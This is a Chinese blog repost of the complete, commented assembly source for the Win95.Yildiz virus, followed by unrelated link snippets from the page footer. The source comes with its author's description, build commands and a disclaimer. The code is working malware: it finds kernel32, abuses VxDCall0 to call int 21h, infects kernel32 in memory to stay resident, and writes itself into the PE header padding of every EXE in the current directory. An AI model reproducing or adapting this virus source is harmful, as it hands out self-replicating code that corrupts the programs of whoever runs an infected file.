原创 2006年06月01日 21:06:00

NAME: Win95.Yildiz
AUTHOR: Black Jack [independant Austrian Win32asm virus coder]
TYPE: Win9x direct acting/global ring3 resident PE header cavity virus
SIZE: 323 bytes (but of course infected files won"t increase in size)

DESCRIPTION: When an infected file is run, the virus takes control. It then
       tries to find the kernel32 base address by a simple algorithm
       which should make it compatible with Win9X and WinME (although I
       haven"t tested it with the second one). After that it gets the
       undocumented Win9X API VxDCall0 and uses it to call int 21h. The
       VxDCall0 API is the very first exported API in Win9X; I don"t
       know which API is first in WinNT, that"s why unpredictable
       results may occur when the virus runs in that OS (I haven"t tried
       it out, but of course the virus can"t work in NT).
       Then it goes TSR (read more about this a bit later), and infects
       all PE EXE files in the current directory by overwriting the
       unused padding bytes in the PE header with the virus body.
       The memory residency consist in infecting kernel32.dll in memory.
       To do so, it creates a temporary file called "Yildiz." and writes
       the first 4KB of kernel32.dll there. Then this file is infected
       like any other PE file. And finally the content of the infected
       temp file is read back into kernel32 memory. Yep, you have read
       right, by using the int21h with VxDCall0 you can read from a file
       into read-only memory! (This trick was discovered by Murkry/IkX,
       read more about it in the comments to his Darkside virus source,
       published in Xine#3).
       As I have already said, the kernel32 is infected in memory just
       like any other file, this means the entry point is set to the
       virus, no APIs are hooked. As you should know, the entry point
       of a DLL is a init routine that is called whenever the DLL is
       loaded by a program. And since kernel32 is imported by all
       programs, this means for us that whenever a program is run (and
       kernel32 is mapped into the program"s address space), our virus
       will infect all PE EXE files in the directory of the program.

        tasm32 /mx /m yildiz.asm
        tlink32 /Tpe /aa yildiz.obj,,, import32.lib

        there"s no need for PEWRSEC or a similar tool, because the
        virus code is supposed to run in read-only memory anyways.

DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
      Therefore, this source was only written for research and
      education. Please do not spread it. The author can"t be hold
      responsible for what you decide to do with this source.

; ===========================================================================

virus_size EQU (virus_end - virus_start)

Extrn MessageBoxA:Proc         ; for first generation only
Extrn ExitProcess:Proc

.model flat
    dd 0              ; dummy data, you know...

    pushad             ; save all registers

    xchg edi, eax          ; put delta offset to EDI (EAX=start
                    ; offset of program by default)

    mov eax, [esp+8*4]       ; EAX=some address inside kernel32

    sub esp, size stack_frame    ; reserve room on stack
    mov esi, esp          ; set ESI to our data on the stack

    xor ax,ax            ; we assume the least significant
                    ; word of the kernel32 base is zero
    cmp word ptr [eax], "ZM"    ; is there a MZ header ?
    JE found_kernel32        ; if yes, we found the correct
                    ; kernel32 base address
    dec eax             ; 0BFF80000->0BFF7FFFF, and then the
                    ; least significant word is zeroed
    JMP search_kernel32       ; check next possible kernel32 base

tmp_filename  db "Yildiz", 0
filespec    db "*.EXE", 0

    mov ebx, [eax+3Ch]       ; EBX=kernel32 PE header RVA
    add ebx, eax          ; EBX=offset of kernel32 PE header

    mov ebx, [ebx+120]       ; EBX=export table RVA
    mov ebx, [ebx+eax+1Ch]     ; EBX=Address array of API RVAs
    mov ebx, [ebx+eax]       ; get the first API RVA: VxDCall0
    add ebx, eax          ; EBX=Offset VxDCall0 API
    mov [esi.VxDCall0], ebx     ; save it
    lea ebp, [edi+int21h-virus_start] ; EBP=offset of our int21h procedure
                    ; for optimisation reasons, the
                    ; CALL EBP instruction is just 2 bytes

; ----- GO TSR --------------------------------------------------------------

    lea edx, [edi+tmp_filename-virus_start] ; EDX=pointer to tmp filename
    push edx            ; save it on stack

    push eax            ; save kernel32 base address on stack

    mov ah, 3Ch           ; create temp file
    xor ecx, ecx          ; no attributes
    call ebp            ; call our int 21h procedure

    xchg ebx, eax          ; filehandle to EBX, where it belongs

    pop edx             ; EDX=kernel32 base address
    push edx            ; save it again

    call write_file         ; write start of kernel32 to temp file

    call infect           ; infect the temp file

    pop edx             ; EDX=kernel32 base address

    mov ah, 3Fh           ; read infected kernel32 fileststart
    call read_write         ; into kernel32 memory

    mov ah, 3Eh           ; close temp file
    call ebp            ; call our int 21h procedure

    pop edx             ; EDX=pointer to temp filename
    mov ah, 41h           ; delete temp file
    call ebp            ; call our int 21h procedure

; ----- INFECT ALL FILES IN CURRENT DIR -------------------------------------

    mov ah, 2Fh           ; get DTA
    call ebp            ; call our int 21h procedure

    push es             ; save DTA address to stack
    push ebx

    push ds             ; ES=DS (standart data segment)
    pop es

    mov ah, 1Ah           ; set DTA to our data area
    lea edx, [esi.dta]       ; DS:EDX=new DTA adress
    call ebp            ; call our int 21h procedure

    mov ah, 4Eh           ; find first file
    xor ecx, ecx          ; only files with standart attributes
    lea edx, [edi+(filespec-virus_start)] ; EDX=offset of filespec

    call ebp            ; call our int 21h procedure
    JC all_done           ; no more files found?

    mov ax, 3D02h          ; open victim file for read and write
    lea edx, [esi.dta+1Eh]     ; DS:EDX=pointer to filename in DTA
    call ebp            ; call our int 21h procedure

    xchg ebx, eax          ; handle to EBX, where it belongs

    call infect           ; infect the file

    mov ah, 3Eh           ; close the victim file
    call ebp            ; call our int 21h procedure

    mov ah, 4Fh           ; find next file
    JMP findfile_loop

; ----- RESTORE HOST --------------------------------------------------------

    pop edx             ; restore old DTA offset in DS:EDX
    pop ds
    mov ah, 1Ah           ; reset DTA to old address
    call ebp            ; call our int 21h procedure

    push es             ; DS=ES (standart data segment)
    pop ds

    add esp, size stack_frame    ; remove our data buffer from stack

    popad              ; restore all registers

    db 05h             ; add eax, imm32
entry_RVA_difference dd (host-virus_start) ; difference between host and
                      ; virus entrypoint (EAX is virus
                      ; entrypoint offset by default)
    JMP eax             ; jump to host entrypoint

; ----- END MAIN PART OF THE VIRUS CODE -------------------------------------

    pop edi             ; restore EDI (delta offset)
    RET               ; return to caller

; ----- INFECT AN OPENED FILE (HANDLE IN BX) --------------------------------

    push edi            ; save EDI (delta offset)

    mov edx, esi          ; EDX=read/write buffer offset
    mov ah, 3Fh           ; read start of file
    call read_write

    cmp word ptr [esi], "ZM"    ; is it an exe file ?
    JNE exit_infect         ; cancel infection if not

    mov ecx, [esi+3Ch]       ; ECX=new header RVA
    cmp ecx, 3*1024         ; check if DOS stub is small enough
                    ; so that all the PE header is in
                    ; our buffer
    JA exit_infect         ; if not, cancel infection

    lea edi, [esi+ecx]       ; EDI=PE header offset in memory
    cmp word ptr [edi], "EP"    ; is it an PE file ?
                    ; (I know that the PE marker is
                    ; actually a dword, but by only
                    ; checking one word we save a byte
                    ; of virus code)
    JNE exit_infect         ; cancel infection if not

    cmp dword ptr [edi+28h], 4096  ; check if entrypoint RVA is in the
                    ; first 4 KB of the file
    JB exit_infect         ; if yes, the file must be already
                    ; infected, cancel infection

    add ecx, 24           ; add size of FileHeader
    movzx eax, word ptr [edi+14h]  ; EAX=size of Optional header
    add ecx, eax          ; add it to ECX
    movzx eax, word ptr [edi+6]   ; EAX=NumberOfSections
    imul eax, eax, 40        ; get size of section headers to EAX
    add ecx, eax          ; add it to ECX, now it points to the
                    ; end of the used part of the PE
                    ; header, where the virus will be.

    mov edx, ecx          ; EDX=virus RVA
    xchg dword ptr [edi+28h], edx  ; set it as new entrypoint RVA
    sub edx, ecx          ; EDX=difference between old and new
                    ; entrypoint RVA

    mov eax, [edi+54h]       ; EAX=SizeOfHeaders (aligned to
                    ; FileAlign)

    lea edi, [esi+ecx]       ; EDI=virus offset in buffer

    sub eax, ecx          ; EAX=free room for us to use
    mov cx, virus_size       ; ECX=size of virus (the most
                    ; significant word of ECX should be 0)
    cmp eax, ecx          ; enough room for the virus ?
    JL exit_infect         ; cancel infection if not

    pop eax             ; EAX=delta offset
    push eax            ; save it again to stack
    xchg esi, eax          ; ESI=delta offset, EAX=data buffer

    cld               ; clear direction flag
    rep movsb            ; move virus body into buffer

    xchg esi, eax          ; ESI=pointer to our data on stack

    mov [edi-(virus_end-entry_RVA_difference)], edx ; store difference
                    ; between old and new entrypoint

    pop edi             ; restore EDI (delta offset)

    mov edx, esi          ; EDX=offset of read/write buffer

                    ; now write modified start of file,
                    ; then return to caller

write_file :
    mov ah, 40h           ; write to file

    xor ecx, ecx          ; ECX=0
    pushad             ; save all registers

    xor eax, eax          ; EAX=4200h (set filepointer from
    mov ah, 42h           ; start of the file
    cdq               ; CX:DX=0 (new filepointer)
    call ebp            ; call our int 21h procedure

    popad              ; restore all registers

    mov ch, 10h           ; ECX=4096 (size of read/write buffer)

                    ; now execute int 21h and return

int21h:                 ; protected mode int21
    push ecx            ; push parameters
    push eax
    push 2A0010h          ; VWIN32_Int21Dispatch function
    call ss:[esi.VxDCall0]     ; call VxDCall0 API


; This is our data that will be stored on the stack:

stack_frame   struc
buffer     db 4096 dup(?)
dta       db 43 dup(?)
VxDCall0    dd ?
stack_frame   ends

    push 0
    push offset caption
    push offset message
    push 0
    call MessageBoxA

    push 0
    call ExitProcess

caption db "Win95.Yildiz Virus (c) 2000 Black Jack", 0
message db "first generation dropper", 0

end virus_start


该爬虫的算法描述如下: 将起始的URL添加到名为listOfPendingURLs的列表中; 当listOfPendingURLs不为空并且listOfTraversedURLs的长度 从listOf...
  • hcy2319964421
  • hcy2319964421
  • 2016年10月25日 21:47
  • 1292


  • abcd92345
  • abcd92345
  • 2017年11月20日 21:59
  • 211


/* * linux/kernel/fork.c * //--fork()用于创建子进程 * (C) 1991 Linus Torv...
  • zx824
  • zx824
  • 2012年11月26日 11:25
  • 1073


  • lixiangminghate
  • lixiangminghate
  • 2015年01月26日 15:44
  • 1170


  • sanpo
  • sanpo
  • 2004年10月05日 08:57
  • 564

快速导入源代码到word 软件著作权源代码需要

使用word软件 点击插入->对象-文件中的文字->然后浏览任意后缀名文件选择大量文件夹或者文件选择导入即可。...
  • u010042660
  • u010042660
  • 2017年10月12日 17:23
  • 545


实现功能:在百度新闻(搜索关键词“中国 美国”,通过url判断,取前120条新闻,并过滤不重复来源的、有效链接新闻。提取新闻文本:提取在html源代码中包...
  • Sindy_Jen
  • Sindy_Jen
  • 2015年03月12日 14:07
  • 984


程序员无论做什么程序, 基本都会接触HTML, 如果做web开发 这就是吃饭的家伙, 移动端APP 的没学过HTML不要紧, 但是要一眼大概可以看懂网页源代码, 有机会最好亲自学习一下HTML5, 最...
  • xy_26207005
  • xy_26207005
  • 2015年10月15日 19:46
  • 1170

HTML 个人简历源码

易水寒的个人简历 易水寒的个人简历(网页版) 制作人:软件学院软开0835班  易水寒  学号:0825033504  编号:39  (作业代号:1-39-0825033504-易水...
  • judyge
  • judyge
  • 2016年08月02日 18:04
  • 3763

Error: "源代码不可用于此位置"

Error: "源代码不可用于此位置" 有一个父页面和一个子页面,在子页面中有一个数据列表,列表的左侧第一列是checkbox。在用户选中第一行第一列的checkbox时实现全选...
  • evilcry2012
  • evilcry2012
  • 2016年02月17日 15:40
  • 1583